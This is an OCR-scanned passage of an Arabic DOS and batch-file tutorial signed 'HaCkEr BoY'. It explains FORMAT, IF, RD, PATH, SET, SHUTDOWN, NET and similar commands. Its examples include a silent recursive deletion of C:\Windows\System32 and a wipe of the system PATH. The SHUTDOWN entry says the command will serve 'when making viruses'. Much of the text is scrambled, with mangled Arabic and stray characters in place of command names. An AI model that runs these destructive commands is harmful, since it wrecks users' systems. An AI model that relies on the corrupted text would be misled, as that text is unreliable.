الأمر المعروف لدى كل المستخدمين» ومن لا يجيد استخدامه لا بد أن يكون قد سمع به.‎ 


وظيفة هذا الأمر هي مسح كافة محتويات السواقة بعدة طرق (سريعء بطيء) و بإمكانه تغيير اسمهاء و نظام 
ملفاتهاء و يأخذ الصيغة التالية: 


FORMAT Drive: /Q/U/V:Label /FS:FileSystem 


هي السواقة التي نريد تطبيق الأمر عليهاء وهي إما أن تكون :© أو :5 أو أي حرف يشير إلى إحدى 
السواقات. 


/٩‏ أي مسح سريع. 

لا/ مسح بطيء مع إعادة تقسيم و تفصيل الخلايا في الهارد ديسك أو السواقة المرنة. 
1:/ لتغيير اسم السواقة» وليس حرفها. 

yste×‏ ۴:۴1 / لتغيير نظام ملفات السواقة. 

متال: 


نريد فرمتة السواقة 2 فرمتة سريعة (مسح سريع) و تغيير اسمها إلى ره۲8ء )عه و تغيير نظام ملفاتها 
إلی N1۴58‏ نکتب: 


FORMAT d: /Q/V:HackerBoy /FS:NTFS 


ملاحظة: لا يمكن استخدام الخيارين 0/ و لا/ معأء لأنه منطقياً كيف للمسح أن يكون سريع و بطئ في نفس 
الوقت؟ 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعية ^HaCkEr_ BoY^‏ 


¥ FTYPE: 
لعرض أنواع مشغلات الملفات الموجودة في النظام» و مسارات برامج التشغيل.‎ 
. بصورة أبسط.‎ 


رأينا في أول الكتاب في الأمر ۸850٥‏ أنواع الملفات و أسماء مشغلاتهاء حيث وجدنا أن مشغل الملفات 
ذات اللاحقة.۳صص هو إءره1اN۲‏ » و بواسطة الأمر ۴۲۷۲۴۴ يمكننا معرفة مسار إءرهاN۴‏ على الجهاز» و 
هو: 


MPlayer=mplay32.exe /play /close "YL" 
نكتب الأمر‎ )A880٥ الآن..» لتعريف نوع جديد من الملفات (كما ذكرنا في الأمر‎ 
ASSOC .SAZ=Samer 
و لتعريف المسار الذي يعمل منه عه نفعل ذلك بواسطة الأمر ۴۲۷۴۴ كالتالي:‎ 
FTYPE Samer="c:\programfiles\samer\samer.exe" "%%1" 
.)؟٤٣ كما يمكننا استخدام متغيرات ويندوز أثناء تعريف المسار(سيتم شرح المتغيرات في فقرة الأمر‎ 
¥ GOTO: 
: من أوامر الملفات الدفعيةء يقوم بالقفز إلى نقطة ما أو سطر ما في الصفحة البرمجيةء شكله العام‎ 


GOTO Label 


11 هو المكان الذي سوف يقفز إليه البرنامج» مثال: 


GOTO WWW 


:WWW 


حيث يجب وضع نقطتين قبل الكلمة التي أشرنا للبرنامج (أي الملف الدفعي) أن يقفز إليها. 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعية ^HaCkEr_ BoY^‏ 


y HEIP: 


للحصول على التعليمات» كما يمكننا الحصول على التعليمات حول أي أمر في دوس بأن نكتب بعده ?/ » 
فكلا الحصرل على تعليمات خرل أمر 60160 نكق: 


GOTO /?‏ 
y IF:‏ 
أمر يستخدم في الملفات الدفعيةء حيث يقوم بتنفيذ أمر ما عند تحقق شرط ماء وله ثلاث صيغ هي: 
IF [NOT] ERRORLEVEL number command‏ 


IF [NOT] string1==string2 command 


IF [NOT] EXIST filename command 


٧01‏ تجعل النظام يقوم بالأوامر فقط إن كان الشرط خاطيء»ء وإن لم نضعها فسيقوم النظام بتنفيذ الأوامر 
عند تحقق الشرط. 


ERRORLEVEL‏ نكتبها عندما نكون بصدد وضع اختيارات عدة يختار المستخدم أحدها (سأقوم بالتفصيل 


اصNu‏ هو رقم الاختيار الذي أدخله المستخدم. 
4ص و هو الأمر الذي نريد تنفيذه إذا ضغط المستخدم رقم كذا. 
مثال : 


IF ERRORLEVEL 1 GOTO SAZ 


:SAZ 


CLS 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعية ^HaCkEr_ BoY^‏ 


EXIT 


ومعنى الكود السابق» أنه إذا أدخل المستخدم رقم 1 اذهب إلى 8947ء وعندما يذهب البرنامج إلى S۸7‏ 
سوف يتم تنفيذ الأوامر الموجودة في تلك النقطة وهي C18‏ أي مسح الشاشةء 5×1١‏ الخروج من البرنامج. 


أما الصيغة الثانية من الصيغ السابقة فتعني: إن كان النصان متشابهان قم بتنفيذ الأوامر. 
و الصيغة الثالثة تعني: إن كان الملف موجود قم بتنفيذ الأوامر..» مثال على الصيغة الثالثة: 


IF EXIST c:\ww.exe GOTO SAZ 


:SAZ 
DEL /Q c:\ww.exe 


ومعنى ذلك أنه إن كان الملف #×ه.س سا:٥‏ موجود (أي إن كان في المسار المحدد ملف بهذا الاسم)ء اذهب 
إلى العلامة S47‏ وعند ذهابه إلى العلامة سيقوم بتنفيذ الأوامر الموجودة داخلها وهي حذف الملف 


مww.e×xا:C‏ دون تنبیەه(0/). 
LABEL:‏ ¥ 
يقوم بعرض أو تعديل اسم سواقة» فلتعديل اسم السواقة ٥:‏ إلى M]٤R‏ 94 نكتب الأمر: 
LABEL c:SAMER‏ 
كما يمكن للأمر أن يأخذ الصيغة التالية: 


LABEL /MP volume label 


۴/ خیار یشیر إلى اننا نرید 
eصuاەV‏ وهو الحرف الخاص بالسواقة. 


1 هو اسم السواقة. 
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كتاب دوس .. وصو لا لبرمجة الملفات الدفعية ^HaCkEr BoY^‏ 


yy MD: 
نكتب:‎ ٥: على السواقة‎ S08۲ أمر لصناعة مجلد» فإذا أردنا إنشاء مجلد اسمه‎ 
MD c:\Samer 
ويمكننا أن ننشئ عدة مجلدات متداخلة في نفس الأمرء فإن عدالنا الأمر السابق ليصبح:‎ 


MD c:\Samer\Bakkr\Hacker\Boy 


سيقوم وندوس بإنشاء مجلد على السواقة ٥:‏ اسمه إعصإه$؟ و سينشئ داخل المجلد $4۳۲ مجلد آخر اسمه 
Bakkar‏ و هکذاء جرب الأمر بنفسك. 


yy MKDIR: 
تفن الأمر اسايق تماما‎ 

¥ MODE: 
الخ.‎ 1۴١1 و‎ C0۸۷1 يقوم بعرض حالة منافذ توصيل الأجهزة المتوفرة في الكومبيوتر متل‎ 

¥ MORE: 


خاص بقراءة الملفات» وهو قليل الاستخدام» و بصراحة لم ولن أستخدمه في حياتي» لذلك لن أقوم بشرحه»ء 
فهو عديد التفرعات دون فائدة. 


yy MOVE: 


من الأوامر الجميلةء له وظيفتانء الأولى هي نقل ملف أو أكثر من مكان إلى آخرء و الثانية هي إعادة تسمية 
ملف أو مجلد» أما بالنسبة للوظيفة الأولى» فلها الصيغة التالية: 


MOVE /Y /-Y C:\MyFolder D:\MyFolder 


۲/ خيار يشير إلى نقل الملفات دون تأكيد عند وجود مجلد بنفس الاسم أو ملفات للقراءة فقط. 


۷-/ عكس الخيار السابق. 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعيةڈ ^HaCkEr_ BoY^‏ 


C:!M y۴‏ هو المجلد الذي نريد نقله» مع ملاحظة أنه يجب وضع المسار کاملا. 


My ۴ 1‏ وهو المكان الجديد للمجلد. 


أما لتغيير اسم المجلد أو الملف فنتبع الصيغة التالية: 


MOVE /Y /-Y C:\MyFolder C:\YourFolder 


نلاحظ أن الأمر لم يتغير فيه شئ إلا أننا وضعنا الاسم الجديد للمجلد بدلا من مكانه الجدید» ۷-/ ۷/ يأخذان 
نفس العمل الذي أخذاه في الصيغة السابقة (نقل مجلد). 


و لتغيير اسم ملف نستخدم نفس الصيغة التي نستخدمها لتغيير اسم المجلدء ولكن بدل اسم المجلد نكثب اسم 
الملف مع الصيغة أي .٤×۴‏ أو.61۴ أو غيرها من الصیغ» أو بإمكاننا استخدام المر RENAME‏ الذي 


سنتحدث عنه لاحقاً. 
y PATH:‏ 


إن الملفات التنفيذية عندما تعمل فإنها تبحث عن ملفات الدعم التي تحتاجهاء مثل مكتبات 011 أو أدوات 
0٣×‏ أو غيرها من الملفات التي تكون ضرورية لعمل البرنامج بشكل سليم» وعندما تبداً عملية البحث فإنها 
تتوجه إلى مجلدات افتراضية يحددها نظام التشغيل مûٽJ C:\WINDOWS\syste¬32‏ ۽ g C:\WINDOWS‏ 
C:\WI]N DOWNS ystem32\W bem‏ وغير ھا... 


و الأمر الأخير (۶۸1383)» يفيد في معرفة هذه المجلدات الافتراضية التي ستبحث فيها البرامج عن المكتبات و 
ملفات الدعم الخاصة بهاء كما يمكن إضافة مجلدات أخرى أو إزالة أخرى. 


لعرض هذه المجلدات» يكتب الأمر ۴۸18 دون إضافات. 


لمسح قائمة المجلدات هذه (وهو أمر خطير)ء نكتب الأمر : 
PATH ;‏ 


أما للتعديل على القائمة (إضافة مجلد آخر مثلا) نكتب الأمر : 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعية ^HaCkEr BoY^‏ 


PATH C:\MyFolder %PATH% 


فبالأمر السابق أضفنا المجلد لاه ۴ر[ الموجود على السواقة ٥:‏ لكي تبحث فيه البرامج عن ملفات دعم 
خاصة بها عند إقلاعهاء و الكلمة %۴۸18% تشير إلى أننا نريد إضافة المجلد المذكور إلى القائمة الموجودة 
أصات ون ل كا فق نكرن ف مسا القاكمة و وضعا المج الذي ذكرناه بدلا منهاء وهذا أمر من شأنه أن 
يضر بعمل البرامج الموجودة على النظام ضررا قاتلا 


¥ PAUSE: 
أمر خاص بالملفات الدفعيةء وظيفته إظهار الرسالة التالية:‎ 
Press any key to continue . . . 
أي اضغط أي زر للمتابعة.‎ 


y PUSHD: 
¥ POPD: 


أمر يفيد في الانتقال إلى فهرس آخر دفعة واحدة (انتقال سريع)» مع إمكائية العودة إلى الفهرس السابق 
باستخدام الأمر [۴0۲. 


أعلم أن الكلام غير مفهوم» لذلك سأوضح ذلك بمثال. 
لنفرض أننا نعمل على الفهرس 
C:\Documents and Settings\SamerBakkar\Desktop>‏ 


و أريد الانتقال إلى الفهرس ءعهإ۴ 5:11٥)‏ لأجري بعض الأوامر» ولكني إما لا أريد أن أنسى أين كنت.. 
(أي الموقع الذي كنت فيه قبل أن أنتقل إلى الفهرس الثاني)ء أو أني لا أريد أن أكتب كل هذا السطر (أي المكان 
أو الفهرس الأول)ء الآن أكتب الأمر: 


PUSHD D:\HackProgs 


فينتقل بي دوس إلى السواقة :5 المجلد كعهإ۴ )ء1 الآن أجري أوامري و أفعل ما أريد أن أفعل» وعندا 


POPD 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعية ^HaCkEr_ BoY^‏ 


لأجد نفسي ثانية في الفهرس الذي كنت فيه سابقاء و الذي هو: 


C:\Documents and Settings\SamerBakkar\Desktop 


إن الأمر ۴051D‏ قام بتخزين الفهرس الذي كنت عليه أول الأمر في الذاكرةء ثم نقلني إلى المجلد الثاني» و 
الأمر ۴0۴ قام باسترجاع الفهرس الذي خزنه الأمر ۴052 و نقلني إليه مرة أخرى. 


yJ PRINT: 


يقوم هذا الأمر بطباعة ملف نصي» فلو فرضنا أن لدينا الملف النصي ٥.۲×۲١‏ ۲561ء )ء1 الموجود على 
السواقة :5 » فلطباعة هذا الملف بواسطة الأمر ۴۸١1‏ نكتب الأمر التالي: 


PRINT D:\HackersGuide. TXT 


مع ملاحظة أننا يمكن أن نطبع كافة أنواع الملفات النصية مثل .00€٥‏ و €. و غيرها من أنواع الملفات 
النصية. 


y PROMPT: 


وظيفة هذا الأمر تغبير المحث (أي ما يكون مكتبا قبل المكان الذي نكتب نحن فيه الأوامر)» فالمحث 
الافتراضي هر <ا:٥‏ و إن كنا نعمل على السواقة 5 سيكون المحث <ا:0 إذا اردنا تغيير هذا المحٿث إلى 
1 متلا فإننا نكتب الأمر : 


PROMPT Samer 
الآن سيظهر شكل المحث كالتالي:‎ 
Samer 


و ستتم كتابة الأوامر بعد كلمة إعمصه؟ مباشرةء و بالإمكان إظهار رموز مخصصة سأقوم بذكر الأهم منها 
في التالي: 


5D‏ التاريخ الحالي. 


N‏ السواقة الحالية. 
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كتاب دوس .. وصولا لبرمجة الملفات انلفعıة ^HaCkEr_BoY^‏ 


$ السواقة و المسار. 
1 الوقت الحالي. 
۷ اسم و إصدارة نظام التشغيل. 


فمثلا إذا أردنا إظهار المحث على شكل السواقة و المسار فإننا نكتب الأمر: 


PROMPT $P 
و عندها سيظهر المحث على الشكل التالي:‎ 
8 
و لإعادة المحث إلى حالته الافتراضية نكتب الأمر ۴۸0۴1 دون إضافات.‎ 
Yy RD: 


لإزالة مجلدء وهو يأخذ الصيغة التالية: 
RD [/S] [Q|] Dir‏ 
58 لإزالة كافة محتويات المجلد من ملفات و مجلدات فرعية. 
/٩‏ خيار إذا أضفناه سيقوم الأمر بالحذف دون إعطاء رسالة تنبيه. 
وهو المجلد الذي نريد حذفه. 
فمثلا..» لإزالة المجلد 
C:\Windows\System32‏ 


و حذف كافة محتوياته من ملفات و مجلدات فرعيةء دون تنبيه (أي الحذف دون تأكيد أو سؤال لأخذ الموافقة) 
نكتب الأمر التالي: 


RD /Q /S C:\Windows\System32 
y RMDIR: 


نفس الأمر السابق تماما : 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعية ^HaCkEr_ BoY^‏ 


¥ RECOVER: 
أمر يفحص سواقة ما محاو لا استعادة أجزاء الملفات المفقودةء ويكتب كالتالي:‎ 
RECOVER D: 
¥ REM: 


يستخدم في الملفات الدفعيةء ووظيفته إظهار الملاحظات أو التعليقات» والفرق بينه و بين الأمر ۳80٣ع‏ أن 
الأمر E٤10‏ يقوم بعرض الملاحظة دون إظهار المسار للمستخدم» بينما يقوم الأمر ۸٤١‏ بعرض المسار الذي 
يعمل منه الملف الدفعي مع الملاحظة أو التعليق» ويستخدم كالتالي: 


REM This Batch File Has Been Created By ^HaCkEr BoY^ 


و ستتضمن نتيجة الأمر المحث» و المسار الكامل للمجلد أو الفهرس الذي عمل منه الملف الدفعيء بالإضافة 
إلى التعليق. 


لإعادة تسمية ملف ويستخدم كالتالي : 


REN D:\HackersUtility.exe HackersTool.exe 


لاحظ كيف أننا كتبنا أولا الأمر ۸٤×‏ ثم ذكرنا مسار و اسم الملف الذي نريد إعادة تسميته» ثم الاسم الجديد 
للملف. 


y RENAME: 
تشن الام السانق تماهاء رل شن ظريقة الاد تكداء:‎ 


y REPLACE: 


أمر لاستبدال الملفات و المجلدات» يأخذ الصيغة التالية: 


REPLACE C:\Folder1l D:\Folder2 /A /P /R /S /W /U 


1 هو المجلد(ويمكن أن يكون ملف) الأولء المصدر الذي نريد أن نستبدل به مجلد آخر. 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعية ^HaCkEr_ BoY^‏ 


2 هو المجلد الهدف الذي نريد استبداله. 

4/ يضيف ملفات جديدة إلى المجلد الهدف» إن هذا الخيار لا يمكن استخدامه مع الخيار 8/ أو مع الخيار 0ا/. 
۴/ لعرض تنبيه قبل استبدال الملفات» وسؤال المستخدم هل يريد استبدالها أم لا. 

۸/ لاستبدال الملفات ذات الصفة (للقراءة فقط)» كما لو كانت ملفات عادية. 


58 لاستبدال كافة الملفات و المجلدات الفرعية الموجودة في المجلد الهدف» لا يمكن استخدام هذا الخيار مع 
الخيار ۸/ 


/ لاستبدال التحديتات فقطء أي الملفات التي تحمل تاريخ تعديل أو إصدار أحدث دون التعرض للملفات 
المتشابهة بالتاريخ أو الأقدم» إن هذا الخيار لا يمكن استخدامه مع الخيار ۸/. 


yY SET: 


من الأوامر الجميلةء يعمل هذا الأمر على إظهار المتغيرات الموجودة في بيئة ويندوزء و المتغير هو أي 
شرط أو حدث أو صفة يمكن أن يأخذ قيماً متعددةء أي أن ( متغير) تشير إلى إمكانية تغير القيمة الخاصة به. 


إن لبيئة ويندوز متغیرات عديدة› منھا ٣اdمرآس‏ وهو مجلد ویندوز› و ۲٤ NP‏ وهو المجلد الخاص بالملفات 


n 


المؤقتة التي تضعها البرامج المتنوعة على الجھازء ثم تزيلھا بعد الانتھاء منھا« و‫ USERNAME‏ وھو اسم 
مستخدم الكومبيوتر» والعديد من الأمور التي سنستفيد منها بشكل واضح. 


نعود للأمر S8١‏ قلنا أن هذا الأمر يعمل على إظهار المتغيرات الموجودة في بيئة ويندوز» إذا كتبنا الأمر 
1 دون أي إضافات» سيعرض لنا 00S‏ كافة المتغيرات دفعة واحدة»ء لكننا إن أردنا معرفة متغير واحد فقط 
فيكون الأمر كالتالي: 
SET USERNAME‏ 
هذا لمعرفة اسم المستخدم» ويكون: 


SET ProgramFiles 


إذا أردنا معرفة المسار الافتراضي التي تذزل فيه البرامج. 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعيةڈ ^HaCkEr_ BoY^‏ 


: تعديل قيمة متغير‎ ٥ 


نلاحظ أن الأمر كماز۴صهإعهإ۴ S٤1‏ قد عاد بقيمةء إن هذه القيمة قابلة للتعديل» فلو أردنا تعديل المسار 
الافتراضي لتنصيب البرامج إلى المجلد ۴۸06۴11٤8‏ الموجود على السواقة ۴۰۱ نكتب الأمر التالي: 


SET ProgramFiles=F:\ PROGFILES 
و هكذا يتم تغيير قيمة المتغيرات» و يكون الشكل العام لهذه العملية كالتالي:‎ 
S۴1 القيمة الجديدة للمتغير اسم المتغیر‎ 
إنشاء متغیر:‎ ٥ 


يمكن إنشاء متغير باستخدام الأمر S81؟»‏ لكن هذا المتغير سيدخل ضمن متغيرات بيئة ويندوز» و سيحجز 
ماح من الاكرة خاصة بهو طرهة لاء مور باتكل الأمر ١ 8٤١‏ تاخ السغة اة 


SET Samer=I Am HaCkEr BoY 


نلاحظ كيف كان التسلسل» أولا الأمر S81‏ و بعدها اسم المتغير الذي نريد تعريفهء ثم إشارة يساوي = ثم 
قيمة المتغير . 


ه استخدام قيمة متغیر : 


إن الهدف وجود و تعديل و إنشاء كافة المتغيرات هو استخدام القيم التي تحملهاء ويمكن استخدام أي متغير بأن 
نضع اسمه بين إشارتي %% » فمتلاء إذا أردنا استخدام المتغير السابق $4٥6١‏ نستخدمه كالتالي: 


ECHO %Samer% 
و ستكون نتيجة الأمر السابق هي طباعة الجملة:‎ 
I Am HaCkEr BoY 


على الشاشة؛ ويجب ملاحظة أنه عند التعامل مع المتغيرات هناك فرق بين الأحرف الكبيرة و الصغيرةء 
فكلمة $847 تختلف عن .5S4⁄‏ 


هناك متغيرات أخرى يوفرها ويندوز مثل: 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعية ^HaCkEr_ BoY^‏ 


4%( وهو يحمل قيمة التاريخ كما تظهر في الأمر 05۸1۴. 
1% و يحمل قيمة الوقت الحالي كما يعيده الأمر .۲1!M٤‏ 


y SETLOCAL: 
y ENDLOCAL: 


يستخدمان في الملفات الدفعيةء الأمر الأول يفيد في تخصيص متغيرات الملف الدفعي للملف الدفعي فقطء و 
الثاني لإزالة هذه الصفةء إن ما سيتم تخصيصه للملف الدفعي يجب أن يتوضع (يقع( بعد الأمر SE1LOCAL‏ 
و کل ما کان قبله لا يوخذ بالحسبان. 


y SHIFT: 


يستخدم في الملفات الدفعيةء يقوم بتغيير ترتيب الرموز الخاصة القابلة للتغير في الملف الدفعي» مثل 9% أو 
غيرها من الرموز التي تشير إلى مكان العمل أو ما تم إنجازه منهء وله الصيغة: 


SHIFT /N 
فمثلا إذا كتبنا:‎ »881۴١ هي قيمة عددية سيبداً منها الأمر‎ N حيث‎ 
SHIFT /4 
سيتم تجاهل القيم 3 و2 و1 و 0ء و سيتم البدء ب4.‎ 
¥ SORT: 


أُمر خاص بالترتيب كما هو واضح» استعمل ۸/ للترتیب ترتیبا تنازلیا من 7 إلى ۸ ومن 9 إلى 0. 
SORT /R C:\PassList.txt C:\PassListSorted.txt‏ 
سیرتب الملف ترتيبا تنازليا و يخزنه في الملف الثاني . 


وإن أردت أن ترتب ترتيبا تصاعدياء فببساطة لا تضع ۸/ » إن هذا الأمر نادر الاستخدام حاليأًء ولكن يمكن 
الاستفادة منه. 
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كتاب دوس .. وصو لا لبرمجة الملفات lلدفعية ^HaCkEr BoY^‏ 


¥ START: 
أمر لتشغيل برنامج آخر في نافذة جديدةء فمثلاء لتشغيل نافذة دوس جديدة اكتب:‎ 
START Command 
و لتشغيل المفكرة نكتب:‎ 
START NotePad 
لهذا الأمر بعض التفرعات (الخيارات) التي ربما تكون مفيدةء سأذكر أهمها:‎ 
. لتشغیل البرنامج بشكل مصغر‎ / N 
بشکل مکبر ۔‎ /M1۸× 
بشكل عادي.‎ /NORMAا‎ 
تشغيل البرنامج و الانتظار من أجل إصدار أمر.‎ / 1 
لتحديد العنوان الذي سيظهر للبرنامج عندما يعمل.‎ 91۸۸١ ۳7ا۲“ ويوضع بعد‎ 
y TIME: 


لعرض وإعادة ضبط» اكتب الأمر 11۷٤‏ » إذا أردت تغيير الوقت أي إعادة ضبطه»ء فأدخل الوقت الجديدء 


وان لم ترد» فاضغط زر 81)٥۲‏ دون كتابة أي شيء. 
TITLE:‏ ¥ 


لتغيير عنوان صفحة الدوس» افتح دوس و اکتب ۰11۲1۴٤ “$4٤۲۶‏ واضغط ٤٣)٥۲‏ ماذا حدث؟ 


لاحظ أن عنوان الصفحة (الشريط الأزرق في أعلى الصفحة) قد تغير إلى إعمصهS؟»‏ وهكذا يكون شكل هذا 
الأمر كالتالي: 


TITLE “YourTitle” 
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y TREE: 


يقوم بعرض كافة مكونات جهاز الكومبيوتر من مجلدات و ملفات على شكل شجري (متفرع)» ولهذا الأمر 
عدد من الخيارات أهمها: 


4/ لاستخدام أرقام اسكي أثناء العرض. 


۴/ لإظهار اسم الملفات في كل مجلد. 


yY TYPE: 
يستخدم لعرض محتويات ملف نصي» فلقراءة ملف نصي ما نتبع الصيغة:‎ 
TYPE C:\AnyTextFile.txt 
y VER: 
أمر يقوم بإحضار إصدار الويندوس» يكتب دون أي إضافات.‎ 
yy VOL: 


قرم هذا الأمل برضن غنوان .و الزق الخاصض بإخدى السرقات فلإحضار عنوان ورف السواقة :© مكلا 


VOL C: 
ليس للأمر أي تفرعات.‎ 
¥ XCOPY: 
يقوم بنسخ ملف أو ملفات» أو مجلد من مكان لآخرء وتأخذ صيغته العامة الشكل التالي:‎ 


XCOPY FilesToCopy NewPlace /A/P/S/V/E/W/C/Q/F/L/G/H/R/U/K/N/Y/-Y 


لاحظ كم من الخيارات يمكن استخدامها مع الأمر ۴۷ ×٨0‏ وهناك حوالي سبع خيارات أخرى لم أتطرق 
لهاء لكن لا ترتعب من عددهاء فيمكنك استخدام الأمر ۴۷ ×٨0‏ دون أي خيارات إضافيةء كالتالي: 


XCOPY D:\Lim F:\ Lim 


Created By Samer Bakkar ^HaCkEr BoY^ 37 
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38 


و سيتم نسخ كافة محتويات المجلد الأول إلى المجلد الثاني . 


الآن لنعد لشرح خيارات الأمر السابق: 


yم10۳آeا۴‏ هو المجلد أو الملفات التي نريد نسخها مع المسار الكامل لها. 


٥ا NewP‏ هو المكان الذي نريد نسخ المجلد أو الملفات إليه. 


۸/ ينسخ فقط ملفات الأرشيف» أو الملفات التي لها صفة (ملف أرشيف). 


/P‏ للتنبيه قبل صنع أي ملف في ١‏ لمجلد الوجهةء أي قبل أن يتم نسخ الملف يجب أن يعطي ١‏ لمستخدم موافقة 


على النسخ. 


5 نسخ المجلدات الفرعية الموجودة في المجلد المصدر بالإضافة للملفات الموجودة داخلهاء ويقبل المجلدات و 
الملفات الفارغة. 


/٤‏ نفس الخيار $/ لكنه لا يقبل الملفات و المجلدات الفارغة. 
۷ للتحقق من كل ملف جديد. 

۷/ ينذر المستخدم بأن يضغط أي زر قبل البدء بعملية النسخ. 
/ لإكمال النسخ حتى إن وجدت أخطاء تعيق العملية. 

/٩‏ لعدم إظهار أسماء الملفات أثناء النسخ. 

۴/ لإظهار المسار الكامل للملفات و أسمائها أثاء النسخ. 

1/ إظهار الملفات التي سوف يتم نسخها. 

6/ السماح بنسخ الملفات المشفرة. 

#/ نسخ ملفات النظام و الملفات المخفية إن وجدت. 

۸/ الكتابة فوق الملفات ذات الصفة (للقراءة فقط). 


/ نسخ فقط الملفات الموجودة في المجلد الهدف. 
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/ نسخ خصائص الملفات مع الملفات» لأن النسخ العادي سوف يعيد الخصائص إلى الحالة العادية 


.Normal 
النسخ باستخدام الأسماء القصيرة التي ينشئها دوس أثناء عملية النسخ.‎ /N 
عدم التنبيه عند وجود ملفات بنفس الاسم في المجلد الوجهةء أي الكتابة فوقها دون تنبيه.‎ /٣ 
التنبيه عند وجود متل هذه الملفات.‎ /-٣ 
¥ SHUTDOWN: 
وهو من الأوامر الجميلة التي سنتعامل معها عند صناعة الفيروسات» ولهذا الأمر الصيغة العامة التالية:‎ 
shutdown [-i | -1 | -s | -r | -a] [-f] [-m \computername|] [-t xx] [-c "comment"] 
و تفصيلات هذه الصيغة كالتالي:‎ 


ذ- لعرض إطار التحكم بإعادة التشغيل» يستخدم هذا الخيار منفردا دون إضافته لأي خيار آخرء حاول كتابته و 
انظر النتيجة: 


1- إذا استخدمنا هذا الخيار مع الأمر السابق فستكون النتيجة هي تسجيل الخروج. 
ء- إذا استخدمنا هذا الخيار مع الأمر السابق فستكون النتيجة هي إيقاف تشغيل الجهاز. 
-٣‏ إذا استخدمنا هذا الخيار مع الأمر السابق فستكون النتيجة هي إعادة تشغيل الجهاز. 


2- لإحباط عملية إيقاف التشغيل»ء فقد تتعرض أحياناً إلى العداد التنازلي الذي يشير إلى أن الجهاز سوف 
ينطفئ بعد كذا ثانيةء لإلغاء العمليةء افتح الدوس واكتب الأمر 4- S010 W١‏ و سيتم إلغاءها. 


۴- لإغلاق كافة البرامج قيد التشغيل دون تنبيهء أي (هل تريد حفظ التغييرات قبل الإغلاق؟)ء هذا الخيار 
سيقوم بإغلاق البرامج المفتوحة دون عرض التنبيه السابق. 


0mputername‏ «ص- لتحديد الكومبيوتر الذي نريد تتفيذ الأمر عليه (هذا إن كنا نعمل على شبكة)» 
فلإعادة تشغيل الجهاز المسمی ۴٤٥9‏ نكتب الأمر: 


SHUTDOWN -r -m \PC9 


×× ۲- لتغيير مدة العد التنازلي قبل إعادة التشغيل أو إيقاف التشغيل» وتمتل ×× الزمن الجديد بالثواني. 
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“commen”‏ ء- لإضافة تعليق يظهر قبل إيقاف أو إعادة تشغيل الجهاز» حيث ۴7٣٥ء‏ هي التعليق الذي 
سيتم إضافته. 
Y NET:‏ 
هذا الأمر خاص بالتعامل مع الشبكات المحليةء وله تفرعات (خيارات) عديدة جدأء إذا أردت رؤيتها فاكتب 
الأمر: 
NET HELP‏ 
و سيتم عرضها لك» لكني لن أذكر منها إلا ما هو ذو فائدة (من وجهة نظري)» وهي: 
NET ACCOUNTS‏ 
يعرض قائمة بالسمات الخاصة بالحسابات مثل الحد الأدنى لكلمات السر (أي عدد الأحرف الأدنى)ء والحد 
الأقصى لهاء» وغير ذلك من هذه الخصائص. 
NET COMPUTER‏ 
لإضافة جهاز إلى الشبكةء أو حذف جهاز موجود بالفعل» ويأخذ الصيغة التالية: 
لإضافة جهاز : 
NET COMPUTER \ComputerName /ADD‏ 
إن N2‏ mputerدC‏ هو اسم الجهاز الذي نريد إضافته. 
لإلغاء جهاز أو إزالته: 


NET COMPUTER \ComputerName /DEL 


NET USER 
. لعرض قائمة الأجهزة الموجودة على الشبكة» وقائمة المستخدمين الموجودين على كل جهاز‎ 
NET VIEW 


لعرض قائمة الأجهزة الموجودة على الشبكة المحليةء ورقم الأيبي الخاص بكل جهاز» وحالة الاتصال. 
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y CHOICE: 


أمر من أوامر الملفات الدفعيةء وظيفته عرض اختيار على المستخدم» أي إذا ضغط المستخدم كذا حدث كذاء 
وهو من الشكل: 


CHOICE /c:123 


If errorlevel 3 goto :ZZ 
IF errorlevel 2 goto :CH 


IF errorlevel 1 goto :HE 
أوامر أخرى و هكذا..‎ :©C8 نضع داخل 27: أوامر معينةء وداخل‎ 


في المثال السابق الاختيارات هي ثلاثةء إما 1 أو 2 أو 3 ولكن يمكن أن نضع حتى 9 اختيارات مختلفة. 


6 فاك عة من الأرامر الأخرى كل 08۴۸46 الأى يقر اء تجزقة فرص ماء .مذ 


SCANREG رydl‎ sy $8‏ الذي يقوم بعمل نسخة احتياطية للنظام» و يتيح أيضا استعادة نسخة موجودة. 


6 و الأمر ۴021S‏ الذي لا يمكن استخدامه إلا في نظام التشغيل دوس (عند بدء تشغيل الجهاز على 
دوس)» والذي يمكن بواسطته تقسيم القرص الصلب. 


بالإضافة إلى العديد من الأوامر الأخرى» فدوس نظام تشغيل كامل» ومن المستحيل الإلمام بجميع أوامره في 
مثل هذا الكتيب الذي يسعى إلى تعليم كتابة الملفات الدفعيةء لكن ما هو موجود في هذا الكتاب» كاف لكتابة أفضل 
الملفات الدفعية. 


. احظة. 


إن كان لديك أية اقتراحات أو أوامر ترى أنها ضرورية ولم يتم ذكرهاء أرجو إرسال الأمر فقط إلى البريد 
الالكتروني ليتم إضافة شرح للأمر في ملحق لهذا الكتاب» مع الشكر الجزيل مسبقا. 
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كتاب دوس .. وصو لا لبرمجة الملفات llأعية ^HaCkEr_BoY^‏ 
vw‏ 
1 1 چ »چ ww‏ « 


Batch Fı1les 


۷ مقدمة للملفات الدفعية: 


الملفات الدفعية (كما ذكرنا سابقا)» هي ملفات تقوم بتأدية وظائف و أوامر مكتوبة داخلها بمجرد تشغيلهاء و 
الأوامر السابقة (أي أوامر 008)» كلها يمكن استخدامها في برمجة الملفات الدفعية. 


أرجو أن تتأكد من أنك قد حفظت (إلى حد ما) الأوامر السابقةء و إلا فعد إليها و راجعها مراجعة سريعة قبل 
البدء بهذا الجزء» حتى تفهم من أين آتي بالأوامر و ما هي وظائفهاء لأني لن أعيد ما ذكرته سابقاء إنما سأذكر ما 
هو جديد فقط (مع بعض المساعدة). 


لقد ذكرت في القسم السابق أوامر الملفات الدفعية على أنها من أوامر النظام 008 لأن الملفات الدفعية جز ء 
هام و حيوي من النظام دوس» إلا أنها لا تنفصل عنهء فكل ما يكتب داخل الملف الدفعي قليلا أو كثيرأء يتعامل 
مع نظام دوس بشکل مباشر. 


